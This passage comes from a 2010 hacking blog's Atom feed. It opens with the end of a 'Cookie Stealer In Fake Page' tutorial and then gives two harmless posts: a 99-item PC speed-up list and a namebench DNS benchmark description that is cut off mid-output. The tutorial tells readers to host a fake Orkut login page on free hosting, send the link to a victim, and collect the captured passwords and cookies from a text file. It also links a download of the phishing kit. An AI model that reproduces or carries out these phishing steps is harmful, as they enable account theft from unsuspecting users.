Search for "&lt;a href="https://www.google.com/accounts/ServiceLoginAuth?service=orkut" target="_blank"&gt;https://www.google.com/accounts/Servic&lt;wbr&gt;&lt;/wbr&gt;eLoginAuth?service=orkut&lt;/a&gt;" and Replace with Run.&lt;span style="background-color: white;"&gt;php&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
And Change Method From File to get the Login details&lt;br /&gt;
&lt;br /&gt;
Now Upload This two files with a blank notepad as Id.txt to x10hosting server as its best&lt;br /&gt;
&lt;br /&gt;
and send the link to victim&lt;br /&gt;
&lt;br /&gt;
His Cookie And Login Details Will Saved In&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://ur-username.x10hosting.com/ld.txt" target="_blank"&gt;http://ur-username.x10hosting.com/ld.tx&lt;wbr&gt;&lt;/wbr&gt;t&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
means in ld.txt&lt;br /&gt;
&lt;br /&gt;
Upload google_transperant.gif also which u can save from login page /// &lt;br /&gt;
&lt;br /&gt;
For Fake login pages Download This&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.freeuploading.com/files/BgtnoVK/cookie_rar.php" target="_blank"&gt;                                 &lt;/a&gt;&lt;a class="fontfamilyverdana normal12bluebold" href="http://www.ziddu.com/download/8407250/cookie.rar.html"&gt;http://www.ziddu.com/download/8407250/cookie.rar.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Now Just Upload This 3 files in your account of x10hosting&lt;br /&gt;
&lt;br /&gt;
Now Send This type of link to victim&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://example.x10hosting.com/orkut.html" target="_blank"&gt;http://example.x10hosting.com/orkut.htm&lt;wbr&gt;&lt;/wbr&gt;l&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
ok when he will do login in this page u will get the details means cookie and login detail (username and password)&lt;br /&gt;
&lt;br /&gt;
in this file&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://example.x10hosting.com/ld.txt" target="_blank"&gt;http://example.x10hosting.com/ld.txt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Enjoy !!!</content><link href="http://i-xploit.blogspot.com/feeds/8286297806389477850/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/cookie-stealer-in-fake-page.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/8286297806389477850" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/8286297806389477850" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/cookie-stealer-in-fake-page.html" rel="alternate" title="Cookie Stealer In Fake Page" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-5685281281424234126</id><published>2010-01-29T20:04:00.002+05:30</published><updated>2010-02-26T23:08:24.972+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type="text">99 ways to make your computer blazingly fast</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://tinyhacker.com/wp-content/uploads/2009/11/fastcomputer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://tinyhacker.com/wp-content/uploads/2009/11/fastcomputer.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Over the last several years working in IT for various companies as a Systems Administrator, Network Administrator, and Help Desk professional, I’ve written and learned about many ways to increase the performance of not only my PC, but also of the many PCs on my networks ranging from Windows 98 to Windows Vista.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
In this article, I hope to compile a complete list of all the different methods and tricks that I’ve used to get the last bit of juice out of a slow PC. Whether you are using an old PC or the latest and greatest in hardware, you can still use some of these to make your PC run faster.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Note that since I write two blogs, Help Desk Geek and Online Tech Tips, I have previously written about many performance tips already which I will link back to throughout. If I have not written about it, I’ve throw in a link to a relevant article from some of my other favorite sites. This list is in no particular order, just written in the order that I could think of them.&lt;br /&gt;
&lt;br /&gt;
There are probably a lot of great tweaks and performance hacks that I’ve missed here, so feel free to chime in with comments! Enjoy!&lt;br /&gt;
&lt;br /&gt;
1. Defragment your computer hard disk using free tools like SmartDefrag.&lt;br /&gt;
&lt;br /&gt;
2. You should also defragment your Windows pagefile and registry.&lt;br /&gt;
&lt;br /&gt;
3. Clean up hard drive disk space being taken up by temporary files, the recycle bin, hibernation and more. You can also use a tool like TreeSize to determine what is taking up space on your hard drive.&lt;br /&gt;
&lt;br /&gt;
4. Load up Windows faster by using Startup Delayer, a free program that will speed up the boot time of Windows by delaying the startup of programs.&lt;br /&gt;
&lt;br /&gt;
5. Speaking of startup programs, many of them are useless and can be turned off. Use the MSCONFIG utility to disable startup programs.&lt;br /&gt;
&lt;br /&gt;
6. By default, the size of the paging file is controlled by Windows, which can cause defragmentation. Also, the paging file should be on a different hard drive or partition than the boot partition. Read here on the rules for best paging file performance.&lt;br /&gt;
&lt;br /&gt;
7. In Windows XP and Vista, the Windows Search indexing service is turned on for all local hard drives. Turning off indexing is a simple way to increase performance.&lt;br /&gt;
&lt;br /&gt;
8. If you don’t care about all the fancy visual effects in Windows, you can turn them off by going to Performance Options.&lt;br /&gt;
&lt;br /&gt;
9. You can optimize the Windows boot time using a free program called Bootvis from Microsoft.&lt;br /&gt;
&lt;br /&gt;
10. Clean your registry by removing broken shortcuts, missing shared DLLs, invalid paths, invalid installer references and more. Read about the 10 best and free registry cleaners.&lt;br /&gt;
&lt;br /&gt;
11. One of the main reasons why PC’s are slow is because of spyware. There are many programs to remove spyware including Ad-Aware, Giant Antispyware, SUPERAntiSpyware, and more.&lt;br /&gt;
&lt;br /&gt;
12. If you have a deeper spyware infection that is very hard to remove, you can use HijackThis to remove spyware.&lt;br /&gt;
&lt;br /&gt;
13. Remove unwanted pre-installed software (aka junk software) from your new PC using PC Decrapifier.&lt;br /&gt;
&lt;br /&gt;
14. Disable unnecessary Windows services, settings, and programs that slow down your computer.&lt;br /&gt;
&lt;br /&gt;
15. Tweak Windows XP and tweak Windows Vista settings using free programs&lt;br /&gt;
&lt;br /&gt;
16. Disable UAC (User Account Control) in Windows Vista&lt;br /&gt;
&lt;br /&gt;
17. Tweak your mouse settings so that you can copy and paste faster, scroll faster, navigate quickly while browsing and more. Read here to learn how to tweak your mouse.&lt;br /&gt;
&lt;br /&gt;
18. Delete temporary and unused files on your computer using a free program like CCleaner. It can also fix issues with your registry.&lt;br /&gt;
&lt;br /&gt;
19. Delete your Internet browsing history, temporary Internet files, cookies to free up disk space.&lt;br /&gt;
&lt;br /&gt;
20. Clean out the Windows prefetch folder to improve performance.&lt;br /&gt;
&lt;br /&gt;
21. Disable the XP boot logo to speed up Windows boot time.&lt;br /&gt;
&lt;br /&gt;
22. Reduce the number of fonts that your computer has to load up on startup.&lt;br /&gt;
&lt;br /&gt;
23. Force Windows to unload DLLs from memory to free up RAM.&lt;br /&gt;
&lt;br /&gt;
24. Run DOS programs in separate memory spaces for better performance.&lt;br /&gt;
&lt;br /&gt;
25. Turn off system restore only if you regularly backup your Windows machine using third party software.&lt;br /&gt;
&lt;br /&gt;
26. Move or change the location of your My Documents folder so that it is on a separate partition or hard drive.&lt;br /&gt;
&lt;br /&gt;
27. Turn off default disk performance monitors on Windows XP to increase performance.&lt;br /&gt;
&lt;br /&gt;
28. Speed up boot time by disabling unused ports on your Windows machine.&lt;br /&gt;
&lt;br /&gt;
29. Use Process Lasso to speed up your computer by allowing it to make sure that no one process can completely overtake the CPU.&lt;br /&gt;
&lt;br /&gt;
30. Make icons appear faster while browsing in My Computer by disabling search for network files and printers.&lt;br /&gt;
&lt;br /&gt;
31. Speed up browsing of pictures and videos in Windows Vista by disabling the Vista thumbnails cache.&lt;br /&gt;
&lt;br /&gt;
32. Edit the right-click context menu in Windows XP and Vista and remove unnecessary items to increase display speed.&lt;br /&gt;
&lt;br /&gt;
33. Use the Windows Performance Toolkit and the trace logs to speed up Windows boot time.&lt;br /&gt;
&lt;br /&gt;
34. Speed up your Internet browsing by using an external DNS server such as OpenDNS.&lt;br /&gt;
&lt;br /&gt;
35. Improve Vista performance by using ReadyBoost, a new feature whereby Vista can use the free space on your USB drive as a caching mechanism.&lt;br /&gt;
&lt;br /&gt;
36. If you have a slow Internet connection, you can browse web pages faster using a service called Finch, which converts it into simple text.&lt;br /&gt;
&lt;br /&gt;
37. Use Vista Services Optimizer to disable unnecessary services in Vista safely.&lt;br /&gt;
&lt;br /&gt;
38. Also, check out my list of web accelerators, which are programs that try to prefetch and cache the sites you are going to visit.&lt;br /&gt;
&lt;br /&gt;
39. Speed up Mozilla Firefox by tweaking the configuration settings and by installing an add-on called FasterFox.&lt;br /&gt;
&lt;br /&gt;
40. Learn how to build your own computer with the fastest parts and best hardware.&lt;br /&gt;
&lt;br /&gt;
41. Use a program called TeraCopy to speed up file copying in Windows XP and Vista.&lt;br /&gt;
&lt;br /&gt;
42. Disable automatic Last Access Timestamp to speed up Windows XP.&lt;br /&gt;
&lt;br /&gt;
43. Speed up the Start Menu in Vista by hacking the MenuShowDelay key in the registry.&lt;br /&gt;
&lt;br /&gt;
44. Increase the FileSystem memory cache in Vista to utilize a system with a large amount of RAM.&lt;br /&gt;
&lt;br /&gt;
45. Install more RAM if you are running XP with less than 512 MB or Vista with less than 1 GB of RAM.&lt;br /&gt;
&lt;br /&gt;
46. Shut down XP faster by reducing the wait time to kill hung applications.&lt;br /&gt;
&lt;br /&gt;
47. Make sure that you have selected “Adjust for best performance” on the Performance tab in System Properties.&lt;br /&gt;
&lt;br /&gt;
48. If you are reinstalling Windows, make sure that you partition your hard drives correctly to maximize performance.&lt;br /&gt;
&lt;br /&gt;
49. Use Altiris software virtualization to install all of your programs into a virtual layer that does not affect the registry or system files.&lt;br /&gt;
&lt;br /&gt;
50. Create and install virtual machines for free and install junk program, games, etc into the virtual machines instead of the host operating system. Check out Sun openxVM.&lt;br /&gt;
&lt;br /&gt;
51. Do not clear your paging file during shutdown unless it is needed for security purposes. Clearing the paging file slows down shutdown.&lt;br /&gt;
&lt;br /&gt;
52. If your XP or Vista computer is not using NFTS, make sure you convert your FAT disk to the NTFS file system.&lt;br /&gt;
&lt;br /&gt;
53. Update all of your drivers in Windows, including chipset and motherboard drivers to their latest versions.&lt;br /&gt;
&lt;br /&gt;
54. Every once in a while run the built-in Windows Disk Cleanup utility.&lt;br /&gt;
&lt;br /&gt;
55. Enable DMA mode in Windows XP for IDE ATA/ATAPI Controllers in Device Manager.&lt;br /&gt;
&lt;br /&gt;
56. Remove unnecessary or old programs from the Add/Remove dialog of the Control Panel.&lt;br /&gt;
&lt;br /&gt;
57. Use a program click memtest86 or Prime95 to check for bad memory on your PC.&lt;br /&gt;
&lt;br /&gt;
58. Determine your BIOS version and check the manufactures website to see if you need to update your BIOS.&lt;br /&gt;
&lt;br /&gt;
59. Every once in a while, clean your mouse, keyboard and computer fans of dust and other buildup.&lt;br /&gt;
&lt;br /&gt;
60. Replace a slow hard drive with a faster 7200 RPM drive, SATA drive, or SAS drive.&lt;br /&gt;
&lt;br /&gt;
61. Changing from Master/Slave to Cable Select on your hard drive configuration can significantly decrease your boot time.&lt;br /&gt;
&lt;br /&gt;
62. Perform a virus scan on your computer regularly. If you don’t want to install virus protection, use some of the free online virus scanners.&lt;br /&gt;
&lt;br /&gt;
63. Remove extra toolbars from your Windows taskbar and from your Internet browser.&lt;br /&gt;
&lt;br /&gt;
64. Disable the Windows Vista Sidebar if you’re not really using it for anything important. All those gadgets take up memory and processing power.&lt;br /&gt;
&lt;br /&gt;
65. If you have a SATA drive and you’re running Windows Vista, you can speed up your PC by enabling the advanced write caching features.&lt;br /&gt;
&lt;br /&gt;
66. Learn how to use keyboard shortcuts for Windows, Microsoft Word, Outlook, or create your own keyboard shortcuts.&lt;br /&gt;
&lt;br /&gt;
67. Turn off the Aero visual effects in Windows Vista to increase computer performance.&lt;br /&gt;
&lt;br /&gt;
68. If you are technically savvy and don’t mind taking a few risks, you can try to overclock your processor.&lt;br /&gt;
&lt;br /&gt;
69. Speed up the Send To menu in Explorer by typing “sendto” in the Run dialog box and deleting unnecessary items.&lt;br /&gt;
&lt;br /&gt;
70. Make sure to download all the latest Windows Updates, Service Packs, and hot fixes as they “normally” help your computer work better.&lt;br /&gt;
&lt;br /&gt;
71. Make sure that there are no bad sectors or other errors on your hard drive by using the ScanDisk orchkdsk utility.&lt;br /&gt;
&lt;br /&gt;
72. If you are not using some of the hardware on your computer, i.e. floppy drive, CD-ROM drive, USB ports, IR ports, Firewire, etc, then go into your BIOS and disable them so that they do not use any power and do not have to be loaded during boot up.&lt;br /&gt;
&lt;br /&gt;
73. If you have never used the Recent Documents feature in Windows, then disable it completely as a long list can affect PC performance.&lt;br /&gt;
&lt;br /&gt;
74. One basic tweak that can help in performance is to disable error reporting in Windows XP&lt;br /&gt;
&lt;br /&gt;
75.  If you don’t care about a pretty interface, you should use the Windows Classic theme under Display Properties.&lt;br /&gt;
&lt;br /&gt;
76. Disable short filenames if you are using NTFS by running the following command: fsutil behavior set disable8dot3 1. It will speed up the file creation process.&lt;br /&gt;
&lt;br /&gt;
77. If you have lots of files in a single folder, it can slow down Explorer. It’s best to create multiple folders and spread out the files between the folders.&lt;br /&gt;
&lt;br /&gt;
78. If you have files that are generally large, you might want to consider increasing the cluster size on NTFS to 16K or even 32K instead of 4K. This will help speed up opening of files.&lt;br /&gt;
&lt;br /&gt;
79. If you have more than one disk in your PC, you can increase performance by moving your paging file to the second drive and formatting the volume using FAT32 instead of NTFS.&lt;br /&gt;
&lt;br /&gt;
80. Turn off unnecessary features in Vista by going to Control Panel, choosing Uninstall a program, and then clicking on Turn Windows features on and off. You can turn off Remote Differential Compression, Tablet PC components, DFS replication service, Windows Fax &amp;amp; Scan, Windows Meeting Space, and lots more.&lt;br /&gt;
&lt;br /&gt;
81. Install a free or commercial anti-virus program to help protect against viruses, etc. Make sure to use an anti-virus program that does not hog up all of your computer resources.&lt;br /&gt;
&lt;br /&gt;
82. Completely uninstall programs and applications using a program like Revo Uninstaller. It will get rid of remnants left behind by normal uninstalls.&lt;br /&gt;
&lt;br /&gt;
83. If you know what you are doing, you can install several hard drives into your machine and set them up in RAID 0, RAID 5, or other RAID configurations.&lt;br /&gt;
&lt;br /&gt;
84. If you are using USB 1.0 ports, upgrade to 2.0. If you have a Firewire port, try to use that instead of a USB port since Firewire is faster than USB right now.&lt;br /&gt;
&lt;br /&gt;
85. Remove the drivers for all old devices that may be hidden in Device Manager that you no longer use.&lt;br /&gt;
&lt;br /&gt;
86. A more extreme option is to choose a faster operating system. If you find Vista to be slow, go with Windows XP. Switching to Mac or Linux is also an option.&lt;br /&gt;
&lt;br /&gt;
87. One of the easiest ways to speed up your PC is to simply reformat it. Of course, you want to backup your data, but it is the best way to get your computer back to peak performance.&lt;br /&gt;
&lt;br /&gt;
88. Speed up Internet browsing in IE by increasing the number of max connections per server in the registry.&lt;br /&gt;
&lt;br /&gt;
89. If you use uTorrent to download torrents, you can increase the download speeds by tweaking the settings.&lt;br /&gt;
&lt;br /&gt;
90. If you have a desktop background, make sure it’s a small and simple bitmap image rather than a fancy picture off the Internet. The best is to find a really small texture and to tile it.&lt;br /&gt;
&lt;br /&gt;
91. For the Virtual Memory setting in Windows (right-click on My Computer, Properties, Advanced, Performance Settings, Advanced, Virtual Memory), make sure the MIN and MAX are both the same number.&lt;br /&gt;
&lt;br /&gt;
92. If you search on Google a lot or Wikipedia, you can do it much faster on Vista by adding them to the Vista Start Menu Instant Search box.&lt;br /&gt;
&lt;br /&gt;
93. If you have a custom built computer or a PC that was previously used, make sure to check the BIOS for optimal settings such as enabled CPU caches, correctly set IDE/SATA data transfer modes, memory timings, etc. You can also enable Fast/Quick boot if you have that option.&lt;br /&gt;
&lt;br /&gt;
94. If you have a SCSI drive, make sure the write cache is enabled. You can do so by opening the properties of the SCSI drive in Windows.&lt;br /&gt;
&lt;br /&gt;
95. If you have a machine with an older network card, make sure to enable the onboard processor for the network card, which will offload tasks from the CPU.&lt;br /&gt;
&lt;br /&gt;
96. If you are using Windows Vista, you can disable the Welcome Center splash screen that always pops up.&lt;br /&gt;
&lt;br /&gt;
97. If you already have anti-spyware software installed, turn off Windows Defender protection.&lt;br /&gt;
&lt;br /&gt;
98. If you are running a 32-bit version of Windows and have 4GB of RAM or more, you can force Windows to see and use all of the RAM by enabling PAE.&lt;br /&gt;
&lt;br /&gt;
99. Buy a new computer!!!  Pretty easy eh?&lt;br /&gt;
&lt;br /&gt;
I’m sure I have missed out on lots of performance tweaks, tips, hacks, etc, so feel free to post comments to add to the list! Enjoy!</content><link href="http://i-xploit.blogspot.com/feeds/5685281281424234126/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/99-ways-to-make-your-computer-blazingly.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5685281281424234126" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5685281281424234126" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/99-ways-to-make-your-computer-blazingly.html" rel="alternate" title="99 ways to make your computer blazingly fast" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-526872749512569484</id><published>2010-01-21T15:27:00.001+05:30</published><updated>2010-01-21T15:28:32.055+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type="text">Increase your Internet speed.</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://images.orkut.com/orkut/photos/OgAAAKfmaHm75sXgCHbtnsL4wVKbt6zN3hPbgga_oK6kxnfmvQoyMrz-tlunfQbir0y5snhQln_2sVevEG9Tyh3qTo8Am1T1UJfOYL6a_0MkQtO5FJM3dRPITIJ2.jpg" imageanchor="1" linkindex="27" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://images.orkut.com/orkut/photos/OgAAAKfmaHm75sXgCHbtnsL4wVKbt6zN3hPbgga_oK6kxnfmvQoyMrz-tlunfQbir0y5snhQln_2sVevEG9Tyh3qTo8Am1T1UJfOYL6a_0MkQtO5FJM3dRPITIJ2.jpg" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
Are you a power-user with 5 minutes to spare? Do you want a faster internet experience?&lt;br /&gt;
&lt;br /&gt;
Try out namebench. It hunts down the fastest DNS servers available for your computer to use. namebench runs a fair and thorough benchmark using your web browser history, tcpdump output, or standardized datasets in order to provide an individualized recommendation. namebench is completely free and does not modify your system in any way. This project began as a 20% project at Google.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;namebench runs on Mac OS X, Windows, and UNIX, and is available with a graphical user interface as well as a command-line interface.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://namebench.googlecode.com/files/namebench-105.png" imageanchor="1" linkindex="28" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://namebench.googlecode.com/files/namebench-105.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;namebench was written using open-source tools and libraries such as Python, Tkinter, PyObjC, dnspython, jinja2 and graphy.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Screenshots&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Here is what the nameserver overview looks like:&lt;br /&gt;
&lt;img border="0" height="380" src="http://namebench.googlecode.com/files/screenshot-1.0.jpg" width="640" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Mean Response Duration&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://chart.apis.google.com/chart?chxt=y%2Cx%2Cx&amp;amp;chd=e%3AYIa4dAefkeqKt02M7V-8&amp;amp;chxp=0%7C2%2C86&amp;amp;chxr=1%2C0%2C195%7C2%2C-9.75%2C204.75&amp;amp;chxtc=1%2C-720&amp;amp;chco=0000ff&amp;amp;chbh=a&amp;amp;chs=720x182&amp;amp;cht=bhg&amp;amp;chxl=0%3A%7CCyberServ%20PSA%20NL%7CCesidio-A%20DE%7CWebline%20BE%7CCompletel-2%20FR%7CArcor/Vodafone-2%20DE%7CSYS-193.121.171.135%7CScarlet-1%20BE%7CGoogle%20Public%20DNS%7COpenDNS%7CUltraDNS%7C1%3A%7C0%7C20%7C40%7C60%7C80%7C100%7C120%7C140%7C160%7C180%7C195%7C2%3A%7CDuration%20in%20ms?x.png" imageanchor="1" linkindex="29" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://chart.apis.google.com/chart?chxt=y%2Cx%2Cx&amp;amp;chd=e%3AYIa4dAefkeqKt02M7V-8&amp;amp;chxp=0%7C2%2C86&amp;amp;chxr=1%2C0%2C195%7C2%2C-9.75%2C204.75&amp;amp;chxtc=1%2C-720&amp;amp;chco=0000ff&amp;amp;chbh=a&amp;amp;chs=720x182&amp;amp;cht=bhg&amp;amp;chxl=0%3A%7CCyberServ%20PSA%20NL%7CCesidio-A%20DE%7CWebline%20BE%7CCompletel-2%20FR%7CArcor/Vodafone-2%20DE%7CSYS-193.121.171.135%7CScarlet-1%20BE%7CGoogle%20Public%20DNS%7COpenDNS%7CUltraDNS%7C1%3A%7C0%7C20%7C40%7C60%7C80%7C100%7C120%7C140%7C160%7C180%7C195%7C2%3A%7CDuration%20in%20ms?x.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Response Distribution Chart (First 200ms)&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://chart.apis.google.com/chart?cht=lxy&amp;amp;chs=720x410&amp;amp;chxt=x,y&amp;amp;chg=10,20&amp;amp;chxr=0,0,200%7C1,0,100&amp;amp;chd=t:0,16,17,17,17,18,18,21,23,27,29,31,40,67,68,84,101%7C0,1,8,22,32,37,41,44,48,52,55,59,62,66,70,73,77%7C0,12,13,14,15,16,18,19,22,23,25,28,33,37,43,48,65,70,82,103%7C0,1,6,10,14,18,22,25,30,33,37,40,45,49,53,56,60,63,67,70%7C0,8,9,9,9,10,10,12,13,15,16,20,24,37,57,61,65,77,88,93,105%7C0,1,5,14,20,26,30,34,38,42,47,50,54,57,60,64,68,71,75,78,82%7C0,1,9,10,11,12,13,15,17,19,22,29,37,54,62,69,83,91,96,102%7C0,1,5,9,13,17,21,24,28,32,35,39,43,46,50,54,57,60,64,67%7C0,1,10,10,10,11,11,11,12,13,14,16,23,35,59,74,89,112%7C0,1,9,21,39,46,50,54,57,62,65,69,72,76,79,83,87,90%7C0,1,9,9,10,10,10,11,11,13,15,25,51,64,81,98,423%7C0,1,4,16,38,52,61,66,70,73,77,80,84,87,91,94,98%7C0,5,6,6,7,7,8,8,9,10,11,12,13,15,18,24,32,48,59,84,94,126%7C0,1,6,11,18,23,27,32,35,40,44,48,52,55,59,63,67,70,74,78,81,85%7C0,5,6,6,7,7,7,9,9,10,11,12,15,17,21,29,36,55,81,96,134%7C0,1,8,15,26,32,36,40,44,48,53,56,60,63,67,70,74,77,81,85,88%7C0,9,9,10,10,11,11,12,14,15,19,48,50,81,125%7C0,1,7,32,46,53,58,63,68,71,75,80,85,88,92%7C0,1,12,13,14,16,17,18,20,22,24,25,30,35,38,41,58,64,70,89,97,101%7C0,2,5,9,13,17,21,26,29,33,36,40,44,47,51,54,57,61,64,68,71,75&amp;amp;chco=ff9900,1a00ff,80ff00,ff00e6,00e6ff,fae30a,9900ff,9f5734,000000,7b9f34&amp;amp;chxt=x,y,x,y&amp;amp;chxl=2:%7C%7CDuration+in+ms%7C%7C3:%7C%7C%25%7C&amp;amp;chdl=Arcor%2FVodafone-2+DE%7CCesidio-A+DE%7CCompletel-2+FR%7CCyberServ+PSA+NL%7CGoogle+Public+DNS%7COpenDNS%7CSYS-193.121.171.135%7CScarlet-1+BE%7CUltraDNS%7CWebline+BE?x.png" imageanchor="1" linkindex="30" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://chart.apis.google.com/chart?cht=lxy&amp;amp;chs=720x410&amp;amp;chxt=x,y&amp;amp;chg=10,20&amp;amp;chxr=0,0,200%7C1,0,100&amp;amp;chd=t:0,16,17,17,17,18,18,21,23,27,29,31,40,67,68,84,101%7C0,1,8,22,32,37,41,44,48,52,55,59,62,66,70,73,77%7C0,12,13,14,15,16,18,19,22,23,25,28,33,37,43,48,65,70,82,103%7C0,1,6,10,14,18,22,25,30,33,37,40,45,49,53,56,60,63,67,70%7C0,8,9,9,9,10,10,12,13,15,16,20,24,37,57,61,65,77,88,93,105%7C0,1,5,14,20,26,30,34,38,42,47,50,54,57,60,64,68,71,75,78,82%7C0,1,9,10,11,12,13,15,17,19,22,29,37,54,62,69,83,91,96,102%7C0,1,5,9,13,17,21,24,28,32,35,39,43,46,50,54,57,60,64,67%7C0,1,10,10,10,11,11,11,12,13,14,16,23,35,59,74,89,112%7C0,1,9,21,39,46,50,54,57,62,65,69,72,76,79,83,87,90%7C0,1,9,9,10,10,10,11,11,13,15,25,51,64,81,98,423%7C0,1,4,16,38,52,61,66,70,73,77,80,84,87,91,94,98%7C0,5,6,6,7,7,8,8,9,10,11,12,13,15,18,24,32,48,59,84,94,126%7C0,1,6,11,18,23,27,32,35,40,44,48,52,55,59,63,67,70,74,78,81,85%7C0,5,6,6,7,7,7,9,9,10,11,12,15,17,21,29,36,55,81,96,134%7C0,1,8,15,26,32,36,40,44,48,53,56,60,63,67,70,74,77,81,85,88%7C0,9,9,10,10,11,11,12,14,15,19,48,50,81,125%7C0,1,7,32,46,53,58,63,68,71,75,80,85,88,92%7C0,1,12,13,14,16,17,18,20,22,24,25,30,35,38,41,58,64,70,89,97,101%7C0,2,5,9,13,17,21,26,29,33,36,40,44,47,51,54,57,61,64,68,71,75&amp;amp;chco=ff9900,1a00ff,80ff00,ff00e6,00e6ff,fae30a,9900ff,9f5734,000000,7b9f34&amp;amp;chxt=x,y,x,y&amp;amp;chxl=2:%7C%7CDuration+in+ms%7C%7C3:%7C%7C%25%7C&amp;amp;chdl=Arcor%2FVodafone-2+DE%7CCesidio-A+DE%7CCompletel-2+FR%7CCyberServ+PSA+NL%7CGoogle+Public+DNS%7COpenDNS%7CSYS-193.121.171.135%7CScarlet-1+BE%7CUltraDNS%7CWebline+BE?x.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-size: small;"&gt;There is also a full timescale graph as well. &lt;br /&gt;
Command-line version&lt;br /&gt;
&lt;br /&gt;
If you are running the command-line version, you get something that looks like this: &lt;br /&gt;
Fastest individual response (in milliseconds):&lt;br /&gt;
----------------------------------------------&lt;br /&gt;
Scarlet-1 BE     ################# 9.97782&lt;br /&gt;
SYS-193.121.171. ################## 10.56194&lt;br /&gt;
Completel-2 FR   ########################### 16.48903&lt;br /&gt;
CyberServ PSA NL ############################ 16.87098&lt;br /&gt;
OpenDNS          ############################# 17.55810&lt;br /&gt;
Google Public DN ############################## 18.16297&lt;br /&gt;
UltraDNS         ############################## 18.30387&lt;br /&gt;
Webline BE       ###################################### 22.61090&lt;br /&gt;
Cesidio-A DE     ########################################## 25.56205&lt;br /&gt;
Arcor/Vodafone-2 ##################################################### 32.37319&lt;br /&gt;
&lt;br /&gt;
Mean response (in milliseconds):&lt;br /&gt;
--------------------------------&lt;br /&gt;
UltraDNS         ##################### 73.52&lt;br /&gt;
OpenDNS          ####################### 81.91&lt;br /&gt;
Google Public DN ######################### 88.39&lt;br /&gt;
Scarlet-1 BE     ########################## 92.90&lt;br /&gt;
SYS-193.121.171. ############################### 111.16&lt;br /&gt;
Arcor/Vodafone-2 #################################### 128.46&lt;br /&gt;
Completel-2 FR   ####################################### 139.62&lt;br /&gt;
Webline BE       ############################################## 165.15&lt;br /&gt;
Cesidio-A DE     ################################################## 180.79&lt;br /&gt;
CyberServ PSA NL ##################################################### 191.80&lt;br /&gt;
&lt;br /&gt;
Response Distribution Chart URL (200ms):&lt;br /&gt;
----------------------------------------&lt;br /&gt;
http://chart.apis.google.com/chart?cht=lxy&amp;amp;chs=720x410&amp;amp;chxt=x,y&amp;amp;chg=10,20&amp;amp;chxr=0,0,200|1,0,100&amp;amp;chd=t:0,16,17,17...&lt;br /&gt;
&lt;br /&gt;
Response Distribution Chart URL (Full):&lt;br /&gt;
---------------------------------------&lt;br /&gt;
http://chart.apis.google.com/chart?cht=lxy&amp;amp;chs=720x410&amp;amp;chxt=x,y&amp;amp;chg=10,20&amp;amp;chxr=0,0,1631|1,0,100&amp;amp;chd=t:0,2,2,2,2...&lt;br /&gt;
&lt;br /&gt;
Recommended configuration (fastest + nearest):&lt;br /&gt;
